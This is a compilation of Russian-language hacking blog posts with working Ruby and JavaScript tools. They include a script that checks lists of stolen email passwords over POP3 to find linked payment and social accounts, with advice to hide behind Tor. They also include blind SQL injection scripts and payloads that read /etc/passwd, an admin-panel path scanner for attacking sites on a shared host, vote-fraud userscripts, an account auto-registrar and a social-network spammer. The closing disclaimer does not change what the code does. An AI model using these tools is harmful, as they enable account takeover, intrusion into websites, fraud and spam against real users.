<a id="__cf_email__" href="http://cloudflare.com/email-protection.html" class="f091809582839f9eb080999e97848582849c95de939f9d">[email protected]</a>

Где f091809582839f9eb080999e97848582849c95de939f9d – зашифрованная почта.

Реализации расшифровщика Cloudflare Email Encrypt существуют на множестве языков, например товарищ xl7dev представил Cloudflare Email Protection Decoder на PHP и Python. Но разве прогрессивное человечество еще использует эти древние мантры?

Cloudflare Email Protection Decoder на Ruby

def cf_decode(code)
  k=code[0..1].hex
  (2..(code.size-1)).step(2).to_a.map{|i| (code[i..(i+1)].hex^k).chr}.join
end

$ irb
2.0.0-p648 :001 > def cf_decode(code)
2.0.0-p648 :002?>     k=code[0..1].hex
2.0.0-p648 :003?>     (2..(code.size-1)).step(2).to_a.map{|i| (code[i..(i+1)].hex^k).chr}.join
2.0.0-p648 :004?>   end
 => nil 
2.0.0-p648 :005 > cf_decode('f091809582839f9eb080999e97848582849c95de939f9d')
 => "aperson@pingturtle.com" 
2.0.0-p648 :006 >

Нам понадобятся следующие конкурсы (я буду называть их так): Встречи (скрипт meeting), Лицо с обложки (fsrating) и Голосование Мисс/Мистер (contest).

Userscript

Суть накрутки популярности заключается в автоматизации процесса голосования в приведенных выше конкурсах. Для автоматизации я предлагаю использовать Userscript. Что такое Userscript и как его устанавливать я уже описывал ранее.

Собственно сам скрипт:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

// ==UserScript==
// @name        fs_like_click
// @author Lukmus (blog.lukmus.ru)
// @namespace   fotostrana.ru
// @include     about:addons
// @version     1.0
// @require  http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js
// ==/UserScript==
 
(function (window, undefined) {
    var w;
 
    if (typeof unsafeWindow != undefined) {
        w = unsafeWindow
    } else {w = window;}
 
    if (w.self != w.top)return;
 
    alert('fs photo click & contest click 10k with if loaded');
    if (/http:\/\/fotostrana.ru\/\?fsrating=(.)+/.test(w.location.href)) {
    	for(i=0;i<10000;i++){
		setTimeout(function(){
		  if(Math.random()*10>2)
		    $('.ibtn.ibtn-big.ibtn-blue.fsr-photo-like').click();
		  else
		    $('#fsr-photo-next-arrow').click();
		},i*2000);
	}
    }
 
    if (/http:\/\/fotostrana.ru\/contest\/(.)+/.test(w.location.href)) {
 
    	for(i=0;i<10000;i++){
	        if(i==0)delay=10000; else delay=0;
 
		setTimeout(function(){
		  strs=/.+addPaid.+/.test($('.contest-btn.contest-btn-big.contest-popup-main-btn-vote').attr('onclick'));
		  if(!strs)
		    $('.contest-btn.contest-btn-big.contest-popup-main-btn-vote').click();
		  else
		    contestApp.popupMain.next();
 
		},delay+i*2000);
	}
    }
 
    if (/http:\/\/fotostrana.ru\/meeting(\/)?/.test(window.location.href)){
      for(i=0; i<10000; i++){
	setTimeout(function(){$('.meeting-btn-bc.meeting-btn-bc-mb.btn.btn-big.btn-big-mb').click();},i*2000);
      }
    }
 
})(window);

В работе скрипта сможет разобраться любой, кто хоть чуть-чуть знает JavasScript и JQuery. Для не обладающих тайным знанием JS следует знать, что alert('fs photo click & contest click 10k with if loaded'); можно безболезненно удалить или закомментировать, если это предупреждение выводит из себя.

Эксплуатация

После того как Userscript успешно установлен, открываем в браузере Фотострану, логинимся и открываем 3 вкладки: Встречи, Лицо с обложки и Голосование Мисс/Мистер.

Голосование Мисс/Мистер

Помимо захода на саму страницу голосования надо собственно выбрать какого-нибудь персонажа и нажать на него, далее процесс голосования должен запуститься автоматически, однако если этого не произойдет следует обновить страницу (URL с уже выбранным персонажем).

Лицо с обложки

Тут для запуска надо тоже первоначально выбрать кого-нибудь, в случае если скрипт не стартанул нужно также обновить страницу.

Встречи

Здесь никого выбирать не надо, скрипт должен сразу начать голосовать, но если этого не произошло опять же обновляем страницу. Выбирать во Встречах можно не более 100 раз в час, скрипт автоматически выбирает не “Да”, а “Возможно”, но Фотострана учитывает и этот ответ тоже как положительный.

Собственно теперь остается только открыть три вкладки и свернуть браузер, через 3-5 часов ваша популярность взлетит до небес. Причиной такого неожиданного роста внимания к вашей персоне – любопытство и благодарность, если вы за кого-то голосуете или вам “нравится” чья-то фотография, то в Фотостране вас за это обязательно отблагодарят ни о чем не подозревающие дамочки по ту сторону монитора.

userscript

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

// ==UserScript==
// @name        vk_pass
// @author Lukmus (blog.lukmus.ru)
// @namespace   vk.com
// @include     about:addons
// @version     1.0
// @require  http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js
// ==/UserScript==
 
function getUrlVars()
{
    var vars = [], hash;
    var hashes = window.location.href.
      slice(window.location.href.indexOf('?') + 1).split('&');
    for(var i = 0; i < hashes.length; i++){
        hash = hashes[i].split('=');
	vars.push(hash[0]);
        vars[hash[0]] = hash[1];}
    return vars;
}
 
(function (window, undefined) {
    var w;
    if (typeof unsafeWindow != undefined) {
        w = unsafeWindow
    } else {w = window;}
    if (w.self != w.top)return;
 
    if (/http:\/\/vk.com\/login\.php/.test(w.location.href)) {
	email=getUrlVars()['email'];
	pass=getUrlVars()['pass'];
	if(email.length>0) $('#email').val(email);
	if(pass.length>0){
	  $('#pass').val(pass);
	  $('#login').submit();
	}
    }
})(window);

установка в FF

Для начала нужно установить плагин Greasemonkey. Далее активировать этот плагин, после чего добавить в Greasemonkey новый скрипт. В редакторе кода нового скрипта прописать код приведенный выше.

Для Chrome Greasemonkey не нужен, для Opera не знаю. Во всех популярных браузерах добавление Userscript элементарное. Сам скрипт выше должен быть кроссбраузерным, хотя я и не проверял.
После всех этих действий ‘быстрый вход’ такой как в AIVK прекрасно работает, даже лучше чем раньше т.к. нет непонятки с капчей.

суть вкратце

Читаем поочередно из файла логины и пароли от почт, после чего заходим на них по POP3.

Далее проходимся по всем сообщениям и если это сообщение от нужного нам адреса, например Вконтакте.Ру (admin@vkontakte.ru), то добавляем этот логин в нужный список, удаляем из массива этого адресата и идем по его сообщениям дальше. Сканирование одной почты продолжается до тех пор пока не кончатся все адресаты или не закончатся сообщения в почте. Далее берем следующий e-mail.

скрипт

Скрипт написан на Ruby и работает как на версии 1.8, так и на 1.9. Пробовал его только на Linux, но подозреваю, что на Windows он тоже будет прекрасно работать.

получение параметров и начальная настройка

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

#!/usr/bin/ruby
require 'net/pop'
 
if ARGV.size!=3
  puts "<infile> <logfile> <start no>"
  exit
end
 
$infile,$logfile,$start_no=ARGV
$start_no=$start_no.to_i
 
$service=['torrents.ru','tfile.ru','skype.com',
  'ozon.ru','odnoklassniki.ru','smartpay.com.ua',
  'vkontakte.ru', 'webmoney.ru','moneybookers.com',
  'e-gold.com','e-port.ru','agava.ru',
  'hoster.ru','dinohost.ru','eskhosting.ru',
  'infobox.ru','zemskov.ru','art-host.ru']

Итак, скрипт получает в командной строке 3 параметра:

1. файл, содержащий почты и пароли от них в формате mail@example.ru:passwd, причем каждая почта на новой строке
2. файл лога, сюда будут записываться все почты, к которым не удалось авторизоваться  и другие ошибки
3. номер почты в $infile, с которой нужно начать работу. Нумерация с нуля.

Далее идет массив, содержащий сервисы на которые будут сканироваться аккаунты почт. Смысл здесь в домене т.е. сюда нужно добавлять домены с которых высылаются e-mail’ы этих сервисов.

некоторые неключевые функции

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

def exist(str,file)
  outf=File.open(file,'a')
  outf.puts "#{Time.now}: #{str}"
  outf.close
end
 
def log(text,file)
  logf=File.open(file,'a')
  logf.puts "#{Time.now}: #{text}"
  logf.close
  puts "#{Time.now}: #{text}"
end
 
def check_letter(head,service)
  service.each_with_index {|se,i| return i if head.include?(se)}
  return -1
end

Немного объясню функции:

• exist – записывает аккаунт почты в файл одноименный с доменом сервиса, в случае если почта зарегистрирована в этом сервисе
• log – записывает сообщение в файл лога
• check_letter – проверяет заголовок письма на наличие домена сервиса, обходя массив сервисов. В случае если письмо отправлено от нужного домена возвращает индекс этого домена в массиве, в противном случае возвращает -1.

функция сканирования почты

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

def check(mail,pass,service)
    # разбиваем почтовый адрес @, на логин и домен
    login,pop_server=mail.split('@')
    pop_server='pop.'+pop_server
    count_reg=0
 
    begin
        pop=Net::POP3.new(pop_server)
    rescue => e
        return -2
    end#begin
 
    # соединяемся с POP3-сервером
    begin
        pop.start(login,pass)
    rescue => e
      return -1
    end#begin
 
    begin
    # обходим письма в почте
    pop.mails.each do |msg|
        hed=msg.header
        STDOUT.flush
 
        if (si=check_letter(hed,service))>=0
	  print '!' ###
          exist("#{mail}/#{pass}",service[si])
          # удаляем сервис из экземпляра
          # индивидуального массива сервисов
          # для данной почты
          service.delete_at(si)
          count_reg+=1
          if service.size==0
            pop.finish
            return count_reg
          end#if
 
        else
	   print '.'
	end#if
 
    end#each
    rescue EOFError
      pop.finish
      return -4
    rescue Timeout::Error
      pop.finish
      return -3
    rescue Net::POPError
      pop.finish
      return -5
    end#begin
 
    pop.finish
    return count_reg
end#def

Тут следует кое-что учесть. Эта функция в самом своем начале разбивает e-mail адрес на логин @ домен, после чего адрес POP3-сервера получается из суммы ‘pop.’+домен.
Такая схема работает для бесплатных обывательских почт типа: mail.ru, rambler.ru, yandex.ru, hotmail.com итд. Однако, если почта не от популярных сервисов бесплатных почт, то адрес POP3-сервера может быть какой угодно.
Также нужно знать, если домен настроен, например, в услуге Яндекса ‘Почта для домена’, то логин будет равен адресу почты целиком, а не только его первая часть до собаки (@).

обход исходного файла

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

inf=File.open($infile,'r')
i=0
# крутим файл до заданной начальной строки
while(i<$start_no) do
  str=inf.gets
  i+=1
end
 
# построчно обходим файл
while !inf.eof do
  str=inf.gets.chop!
  print "#{i})#{str} checking..." ###
  STDOUT.flush
  ret=check(str.split(":")[0],str.split(":")[1],$service).to_i
  case ret
    when -3
      log("Unknow time is out #{str}",$logfile)
    when -2
      log("Can't connect to the server #{str}",$logfile)
    when -1
      log("Can't auth #{str}",$logfile)
    when 0
      puts "FAIL #{str}"
    else
      puts "#{Time.now}: #{str} SUCCESS #{ret}"
  end
  i+=1
end
inf.close

Ну тут все просто и примитивно.

заключение

Следует помнить, что доступ по POP3 вообще может быть отключен у почты, в этом случае почта будет добавлен в лог, как имеющая не верный пароль. Помимо этого если в списке много раз будет не проходить авторизация, то тот или иной POP3-сервер может забанить ваш IP за брутфорс, чтобы такого не было рекомендую запускать скрипт через известную связку TOR-Privoxy-Proxychains.

Целиком скрипт можно скачать тут - check_mail_for_diff_accs.rb.

Однако, часто так бывает, что на одном хостинге (аккаунт хостинга) размещается куча сайтов, но т.к. аккаунт от хостинга 1, то и сервер БД один, а иногда и БД одна для разных сайтов.

Короче, представим такую ситауцию, вы нашли уязвимое место, скажем SQL-inj, вытащили все пароли, но на этом сайте нет админок или эти пароли не подходят. В таком случае нужно найти все сайты, которые висят на этом сервере или же все сайты, которые принадлежат этому акку хостинга. Узнать последнее – задача не тривиальная, а первое можно через тот же 2ip.ru.

Далее весь этот список сайтов нужно просканировать на различные пути к админке. Havij позволят за 1 раз искать пути только к 1 сайту. А если у нас список из 50-100 сайтов, то каждый раз вбивать в ручную в Havij утомительно.

Я предлагаю такой простенький скриптик, который переберет все пути к списку сайтов. Скачать можно здесь.

конфигурация

Открываем файл config.rb и видим:

1
2
3
4

$site_list="site_list" # список сайтов
$admin_list="admin_list" # список путей к админкам
$th_count=50 # количество потоков
$log_file="log" # лог файл, записываются успешные пути

и все сразу становится понятно.

В архиве прилагается список путей к админкам честно украденный из Havij.

Принцип работы скрипта прост – запрашивает страницу с данным путем и если код ответа сервера не равен 404, то путь записывается в $log_file как успешный.

Еще хочу попросить, если у кого-то есть более полный список путей к админкам, то выложите где-нибудь, пожалуйста.

Первый скрипт долгий т.к. однопоточный, зато точный т.е. стопудов однозначно вычислит символ до которого дошел. Второй многопоточный, иногда немного недовычисляет при частых обрывах сети, однако допустим для вычисления текста файла функцией MySQL LOAD_FILE в самый раз т.к. гораздо быстрее обработает длинный текст, а не досчитанные символы можно самому догадатся или же пробежатся по ним первым скриптом.

Аналогов, наверное, существует немерянно, но несмотря на это, я думаю, что мои скрипты обладают отличным преймуществом – они очень гибкие т.к. примитивны и в них очень легко разобратся.

Что такое SQL-inj, в том числе и слепая скуля, как с ними быть и многое другое, на мой взгляд лучше всего описано в этом FAQ на rdot’е.

скачать скрипт

Как вы понимаете, если у вас слепая инъекция, то никаких прямых выводов на страницу не может быть. Вы задаете какой-либо предикат, а проще говоря, условие, например

128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

и в соответсвии с этим условием у вас отобразится, например, либо новость под номером 10, либо 9. Приведу пример полного запроса:

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

ну или так:

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --


В первом примере, если 128 больше ASCII-кода первого символа файла /etc/passwd, то выведется страница с новостью 10, в противном случае, выведется 9. Второй случай практически идентичен первому, заисключением того, что если не больше ASCII-кода, то выведется неизвестно какая страница (для каждого сайта индивидуально, надо просто попробывать запрос http://site.com/?id= ), скорее всего это будет редирект на главную.

Вообще существует достаточно много всяких способов раксрутки слепых скулей, не только по странице, которую мы получаем на выводе. Короче читаем FAQ, ссылка на которую указана выше.

Так вот скрипт, берет допустим первый символ и формирует такой запрос:

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1))

если условие верно т.е. открылась страница с новостью 10, значит 128>=ASCII>=0, тогда скрипт делает запрос

64>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

32>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

тогда следующий запрос, будет отталкиватся от кода 48 (48=32+32/2)

48>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

тогда вычитаем 8 (на прошлом ходе прибавляли 16, на каждом шаге делем на 2)

40>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

44>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

42>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

41>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

42=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

таким образом мы за 9 шагов однозначно определили символ.

Далее скрипт берет следующий символ и начинает все заново.

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

Я не читал, все статьи по blind SQL-inj, поэтому если кто-то придумал такой перебор раньше меня, а так наверняка оно и есть, не обижайтесь, что здесь нет ссылки на вышу статью и укажите ее в комментариях.

Все разгаданные символы скрипт записывает в файл и выводит на экран консоли.

Она располагается в начале скрипте и представляет из себя инициализацию глобальных переменных.

#config
$request="/article.php?id=44+AND+##NUM####SIGN##ASCII%28MID%28##REPLACE##,##I##,1%29%29"
$outfile="outfile"
$priznak="eta_kartinka_est_tolko_v_statie_s_nomerom_44.jpg"
$func="LOAD_FILE%28"+"0x2f6574632f706173737764"+"%29" #/etc/passwd
$site="www.site.com"
$start=1
#config

$request – сам запрос, с метками:

• ##NUM## – число с которым сравнивается ASCII-код
• ##SIGN## – место, куда будет подставляться знак (>,=)
• ##REPLACE## – сама функция, задающаяся в переменной $func
• ##I## – номер символа

Задаем эту переменную в соответствии с нашим запросом, при этом правильно расставляем метки.

$outfile - файл куда будет все выводится.
$priznak – часть страницы, отличающая страницу с верным выводом от неверной. Т.е. при таком виде запроса

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --

или

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

эта часть текста HTML должна присутствовать только в новости с индексом 10.

$func – функция, которую мы вызываем. Это может быть LOAD_FILE(), VERSION(), USER() итд, комбинации из них, короче все на что хватит фантазии.

$site – сайт, где располагается SQL-inj.

$start – номер символа, с которого начинать.

скачать скрипт

Принцип работы нечем не отличается, заисключением того, что скрипт вычисляет не последовательно символ за символом, а сразу паралельно несколько символов, количество которых равно количеству потоков заданных в конфигурации.

Конфигурация, такая же, добавился лишь один параметр $th_count. Он определяет количество потоков.

Чем же плох многопоточный вариант? При стабильном соединении с интернетом не чем т.е. он вычислит все символы как надо и быстро. Если же соединение часто обрывается, как например на 3G-модемах, то некоторые потоки будут умерать оставляя свой символ недовычисленным. Для примера, при нестабильном соединении (скорость скачет от 1КБ/с до 300КБ/с, соединение обрывается каждые 3-5 минут) из 10 символов 1 будет недовычислен.

В связи с этим событием, с которым может сравнится только финал ЧМ-2010, в адекватности судьи которого, кстати, я не уверен и не признаю никакого другого ЧМ кроме Нидерландов,  я считаю просто необходимо написать авторегер под эту штуку.

Сам скрипт авторега я не написал еще, да думаю и не надо, каждый и сам сможет переписать выложенный здесь код под свои нужды. А написал я класс или точнее сказать скрипт-библиотеку, естественно на Ruby, который содержит все необходимые методы для регистрации мыла, быть может заисключением проверки адреса на существование.

Сам скрипт

#!/usr/bin/ruby
require ‘net/http’
require ‘net/https’

def str2pc(str)
if !str then return “|ERR=#{str}|” end
i=0
pc=”
while i<str.size do
pc+=”%#{str[i].to_s(16)}”.upcase
i+=1
end
return pc
end

class Acc
attr_accessor :login,:pass,:domain
def initialize(login,pass,domain)
@login=login
@pass=pass
@domain=domain
@http=Net::HTTP.new(‘signup.mail.com’, 443)
@http.use_ssl = true
@path=’/UserInformationB.aspx’
end

def get_headers(refer)
return headers = {
‘Cookie’ => @cookie,
‘Referer’ => refer,
‘Content-Type’ => ‘application/x-www-form-urlencoded’,
‘User-Agent’=> ‘Mozilla/5.0 Gecko/20090909 Windows NT 5.0/9′
}
end

def get_fst_cook
begin
resp, data = @http.get(@path, nil)
@cookie = resp.response['set-cookie']
@__VIEWSTATE=data.split(“__VIEWSTATE\” value=\”")[1].split(“\”")[0]
@__EVENTVALIDATION=data.split(“__EVENTVALIDATION\” value=\”")[1].split(“\”")[0].gsub!(/([^a-zA-Z0-9])/){str2pc($1)}
rescue
return e
end
return 0
end

def reg
begin
data = “__VIEWSTATE=#{@__VIEWSTATE}&__EVENTVALIDATION=#{@__EVENTVALIDATION}&hOptin=2&hdCheckbox=1&hdCampaignCheckbox=0&RefenceCode=event01&TrkID=0000&FirstName=fdsjhfj&LastName=jkvhfsdjk&drpMonth=06&drpDay=07&drpYear=1975&Username=#{@login}&Domainname=#{@domain}&Password=#{@pass}&PasswordConfirm=#{pass}&setpw=False&SecQuestion=3&SecAnswer=bhgfhgfhjfghgfhg&Agreed=Create+Account”
resp, data = @http.post(@path, data, self.get_headers(‘https://signup.mail.com/UserInformationB.aspx’))
@cookie = @cookie+resp.response['set-cookie']
@path=resp['location']
resp, data = @http.get(@path, self.get_headers(‘https://signup.mail.com/UserInformationB.aspx’))
@path=resp['location']
resp, data = @http.get(@path, self.get_headers(“https://signup.mail.com/#{@path}”))
rescue => e
return e
end
return 0
end
end#class

#EXAMPLE
accs=Acc.new(“test”,”example”,”california.usa.com”) #test@california.usa.com:example
puts accs.get_fst_cook
puts accs.reg

Немного разберем скрипт.

Итак, он содержит 1 функцию – str2pc и класс Acc. str2pc преобразует символы в процент-код.

Класс Acc

• метод get_headers – возвращает заголовок пакета
• метод get_fst_cook – получает необходимые кукисы и параметры для дальнейшей регистрации
• метод reg – собственно сама регистрация

Рассмотрим подробнее метод get_fst_cook. Он получает страницу регистрации /UserInformationB.aspx методом GET, а в месте с ней и первые кукисы. Далее парсит страницу на 2 необходимых параметра:

1. __VIEWSTATE
2. __EVENTVALIDATION

причем в __EVENTVALIDATION попутно заменяются все символы, неудовлетворяющие регулярному выражению ([^a-zA-Z0-9]) на процент-код.

Метод reg. Отправляет собственно сам POST-запрос регистрации, а затем 2 GET запроса на страницы /UserInformationB.aspx и той, на которую стоит переадресации в полученном пакете. Последний запрос не обязателен и регистрация пройдет и без него, однако он нужен если вы не хотите получить при входе на мыло страницу о успешной реги и прочей фигне.

Как использовать класс

Все очень просто и пример описан под комментарием #EXAMPLE:

1. в конструкторе вводим логин, пароль и домен – accs=Acc.new(“test”,”example”,”california.usa.com”)
2. вызываем get_fst_cook, в случае ошибки возвращает текст ошибки, иначе 0 – accs.get_fst_cook
3. вызываем reg, в случае ошибки возвращает текст ошибки, иначе 0 – accs.reg

Это все. Чтобы сделать из этой библиотеки полноценный авторегер особого ума не надо, и если же вы все-таки его сделаете незабудьте выложить в паблик.

Скачать скрипт в нормальном виде можно здесь.

P.S. хочу также сказать спасибо nonamez’у за его пост в его блоге, где он поведал о плагине для FireFox Live HTTP Headers, без него было бы тяжко разбирать снифером HTTPS-пакеты. Статью можно прочитать здесь.

Например:

для запуска с такими аргументами:

./console_fraktal.rb 0.1*x**2-3*x-150 10000 -f 2ex.jpg -ic 36 -bc white -nss

создается файл 2ex.jpg следующего содержания:

При таком запуске

./console_fraktal.rb 0.1*x**2-3*x-250 x**2/100+y**2/100 -f 3ex.jpg -ic 36 -bc white

Вообщем там много всяких параметров и соответственно можно изобразить много чего. Все параметры описаны в хелпе скрипта, который выводится если скрипт запустить без параметров.

Единственная практическая ценность этого срипта – он может служить хорошим примером работы с библиотекой Rmagick. Rmagick – библиотека для работы с изображениями, поддерживающая более 90 форматов, основана на ImageMagick и GraphicsMagick).

Пользователи Linux могут легко установить ее

• для RH: yum install ruby-RMagick
• для Debian: apt-get ruby-RMagick
• для Slackware: как всегда качаем тарбол с офсайта и читаем readme.

Что касается Windows тут все гораздо сложнее.

На офсайте где-то писали, что какому-то левше удалось установить ее на винду, однако как я не пытался мне это так и не удалось.

Следуя инструкциям с офсайта, установив все что там написано, после запуска вылезает куча ошибок, которые якобы устраняются установкой нескольких различных dll’ок. Собрав по всему интернету коллекцию этих dll, какие-то ошибки и правда устранились, однако скрипт так и не запустился корректно. Короче, это лишний повод для перехода с винды на линукс )).

Скачать скрипт можно здесь.

Что такое фигуры Лиссажу читаем на википедии. Теперь про сам скрипт. Скрипт написан на ruby и задействует библиотеку qt. Скрипт в окне рисует эти самые фигуры, плавно меняя цвет. По нажатию на кнопку ‘Next’ меняются параметры уравнений и в окне начинает рисоваться новая фигура.

Я немного слукавил, говоря, в самом начале, что здесь нечему научится. Здесь примечателен метод paintEvent(e) класса Lissajous<Qt::Widget, именно он и рисует фигуру. Да и вообще, я считаю это нормальным примером работы с Qt, причем не только для Ruby т.к. все отличие от взаимодействия с этой библиотекой скажем в C++ заключается лишь в различном синтаксисе C++ и Ruby. Человек, читающий Фултона, конечно, для себя здесь ничего не откроет, а студенту в самый раз.

Скачать эту вакханалию можно здесь. как установить qt и ruby можно прочитать соответственно здесь и здесь.

Во-первых, хотелось бы отметить недобросовестность веб-мастеров и верстальщиков этой СС, так например, если заходить на нее через линуксовую мозиллу, то заглавная страница предоставляет не совсем дружественный интерфейс:

Закончим со стебом.

Сегодня я покажу вам спамер по этой СС. Написан он, как обычно для меня, на Ruby и как всегда разделен на файлы, каждый из которых выполняет определенную задачу:

• config.rb – конфигурация
• lib.rb – скрипт-бибилиотека
• get_list.rb – исполняемый скрипт, набирает список id по нашим критериям
• main.rb – собственно сам спамер

Весь код приводить здесь, я думаю не имеет смысла, поэтому кратко пройдемся по основным деталям.

Код lib.rb представляет из себя класс Account, который содержит методы, помимо конструктора:

• auth – авторизация, в случае успешной возвращает 0
• send – отправить ‘что-то’, почему ‘что-то’, а не например сообщение станет понятно дальше
• sendmsg – отправить сообщение
• add2friend – пригласить в друзья
• gets_people – получить список аккков по критериям

А так же lib.rb содержит парочку ненужных функций: log – ведение логов и str2pc – перевод текста в процент-код.

Итак, почему же метод send отправляет ‘что-то’? Ответ прост, дело в том что в МТ отправить приглашение на дружбу и отправить сообщение это одно и тоже действие, отличаются там только некоторый параметры. И как следствие этого, методы sendmsg и add2friend используют метод send и лишь добавляют туда свойственные им параметры.

На этом более-менее соображающие программисты заканчивают читать статью, качают архив со скриптами и начинают творить новое малваре для МТ.

А для вас, уважаемые ленивцы, безфантазийные псевдокодеры, поисковые боты и прочая элита я опишу и все остальное.

Скрипт get_list.rb

#!/usr/bin/ruby

require ‘config.rb’
require ‘lib.rb’

def get_next(type)
if type==’random’ then     return 2000+rand(10000000) end
if type==’list’ then     return $list_from+=1 end
end

if $ptype!=’params’
fl=File.new($idfile,’a')
for i in 0..$count do fl.puts get_next($ptype) end
fl.close
else
acc=Account.new($test_login,$test_pass)
if acc.auth==0
ids=acc.gets_people($params['interest'],$params['city'],

$params['sex'],$params['agf'],$params['agt'],$count)
fl=File.new($idfile,’a')
ids.each {|id| fl.puts id}
fl.close
else puts “Invalid login or password” end
end

И делает он следующее:

1. считывает параметры из конфига
2. если собрать id надо не по параметрам, то будет нещадно эксплуатировать функцию get_next
3. функция get_next определяет как собирать id: по порядку или в случайном порядке, и собственно при каждом ее запуске возвращает id
4. если же список по параметрам, то в вызывает метод Account::gets_people
5. весь собранный любым способом список id выгружается в файл, заданный в конфигурации

Скрипт main.rb

Это сам наш спамер. Он работает тоже не сложно:

1. считывает из файла, список акков с каких мы спамим
2. ну и в цикле:
   1. считывает id, которая на очереде для спама
   2. берет акк для спама и авторизуется им (для каждого акка авторизация проводится только 1 раз)
   3. ну и сосбственно спамит, инвайтит или спамит и инвайтит
   4. в случае ошибки запишет ее в лог
3. и все

Конфигурация config.rb

#!/usr/bin/ruby

$accfile=”accfile.txt”
$idfile=”ids.txt”
$logfile=”log.txt”

$ptype=”list” #random/params/list – как искать

$wtype=”all” #add/msg/all

$test_login=”example@mail.ru”
$test_pass=”passwd”

$params=Hash[
'interest'=>'секс', #интересы
'city'=>'москва',
'sex'=>'male', #male/female - пол
'agf'=>'10', #возраст от
'agt'=>'30' #возраст до
]

$list_from=666

$count=1
$msgtext=”текст сообщения”

$accfile – файл с вашими акками вида login:pass

$idfile – список id

$logfile – логи

$ptype – тип составления списка id:

• random – случайно
• params – по параметрам
• list – по порядку

$wtype – тип действия:

• add – выслать инвайт на дружбу
• msg – отправить сообщение
• all – оправить сообщение и инвайт

$test_login и $test_pass – логин и пароль акка для набора id.

$params – здесь пишутся параметры для списка id, если список составляется по параметрам ($ptype=”params”).

$count – количество отсылаемых сообщений и количество id при составлении списка

$msgtext – текст сообщения

Ну вот и все, пользуйтесь но не переусердствуйте, иначе спамер в скором времени может оказатся неработоспособным.

Скачать спамер можно здесь, как установить и запустить ruby читаем здесь.

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.